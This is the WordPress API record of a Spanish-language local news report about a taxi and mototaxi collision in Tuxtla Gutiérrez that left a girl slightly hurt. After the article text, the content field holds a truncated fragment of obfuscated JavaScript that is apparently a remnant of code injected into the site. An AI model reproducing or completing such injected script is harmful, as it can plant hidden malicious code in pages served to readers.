{"id":14789,"date":"2024-03-23T03:09:32","date_gmt":"2024-03-23T03:09:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14789"},"modified":"2024-03-23T03:09:32","modified_gmt":"2024-03-23T03:09:32","slug":"chocan-taxi-y-mototaxi-en-la-bienestar-social","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14789","title":{"rendered":"Chocan taxi y mototaxi en la Bienestar Social"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1711163284468-1024x768.jpg\" alt=\"\" class=\"wp-image-14790\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1711163284468-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1711163284468-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1711163284468-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1711163284468.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 22 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes un taxi y un mototaxista chocaron en la Colonia Bienestar Social dejando un saldo de una menor lesionada y da\u00f1os materiales.Este hecho ocurri\u00f3 cuando un taxi Tsuru con n\u00famero econ\u00f3mico  0653 circulaba a la altura de la Calzada Caminera y Avenida 5 de Mayo, y de manera repentina dio vuelta en U, ocasionado que el mototaxi se estrellara. En el lugar los elementos de tr\u00e1nsito informaron que, el taxista circulaba en sentido contrario y el motociclista de Norte a Sur, y de manera repentina vio interrumpido su camino. En la peque\u00f1a unidad, viajaba el conductor y sus dos hijas, una de ellas result\u00f3 con lesiones menores. En el lugar el responsable, se hizo cargo de los da\u00f1os mediante un seguro automotriz. Las unidades fueron remolcadas a un taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 22 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes un taxi y un mototaxista chocaron en la Colonia Bienestar Social dejando un saldo de una menor lesionada y da\u00f1os materiales.Este hecho ocurri\u00f3 cuando un taxi Tsuru con n\u00famero econ\u00f3mico 0653 circulaba a la altura de la Calzada Caminera y Avenida 5 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14790,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14789","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14789","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14789"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14789\/revisions"}],"predecessor-version":[{"id":14791,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14789\/revisions\/14791"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14790"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14789"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14789"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14789"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}